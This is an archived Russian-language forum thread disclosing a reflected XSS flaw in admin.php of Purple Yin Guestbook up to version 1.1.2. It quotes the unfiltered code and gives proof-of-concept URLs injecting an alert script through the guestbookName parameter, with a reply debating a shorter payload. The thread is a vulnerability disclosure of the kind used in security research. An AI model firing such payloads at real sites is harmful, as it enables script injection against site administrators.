PDA

Просмотр полной версии : Пассивные XSS в Purple Yin Guestbook Version <=1.1.2


1ten0.0net1
23.09.2006, 02:25
Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения.

Пример бажного кода admin.php:

$guestbookName=GUESTBOOK_NAME;
.....
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>

Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.


Proof of concept:

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.

P. S. Работает в Internet Explorer

[hidden]
23.09.2006, 08:40
Может, я чего-то не догоняю, но если заходить по адресу

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

то это преобразуется в

<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td>

Может, можно обойтись

http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ?

Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..

KPOT_f!nd
24.09.2006, 02:08
Пригодиться!